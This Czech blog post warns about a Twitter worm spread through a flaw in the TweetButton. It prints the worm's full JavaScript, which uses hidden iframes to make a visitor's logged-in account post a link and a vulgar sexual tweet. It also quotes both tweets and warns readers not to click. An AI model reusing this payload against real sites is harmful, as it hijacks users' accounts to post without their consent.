A zase další twitter exploit
Není to tak dávno, co se twitterem šířil "začerňovací" virus a dnes tu máme další. Lépe řečeno exploit. Tentokráte už zasahuje i všechny klienty (nejen web), protože se šíří formou odkazu a vulgárního tweetu. A šíří se opět lavinově. Tady jsou oba dva tweety:
Tweet 1: WTF: http://t.co/SwNMYI2
Tweet 2: i love anal sex with goats
Zkoumal jsem zdroják exploitu a zjistil jsem, že jde o zranitelnost nedávno nasazeného TweetButtonu. Pro znalé přikládám zdroják javascriptu, který toto zapříčinil. Je opravdu jednoduchý a je až do nebevolající, že vůbec může fungovat. Je to bezpečnnostní trhlina jak prase!
var el1 = document.createElement('iframe');
var el2 = document.createElement('iframe');
el1.style.visibility="hidden";
el2.style.visibility="hidden";
el1.src = "http://twitter.com/share/update?status=WTF:%20" + window.location;
el2.src = "http://twitter.com/share/update?status=i%20love%20anal%20sex%20with%20goats";
document.getElementsByTagName("body")[0].appendChild(el1);
document.getElementsByTagName("body")[0].appendChild(el2);Rozhodně na odkaz neklikejte. Ani ze zvědavosti, protože tím okamžitě odešlte tyto tweety i z vašeho účtu. A vy snad přece nemáte rádi to, co ten tweet tvrdí 
Doufám!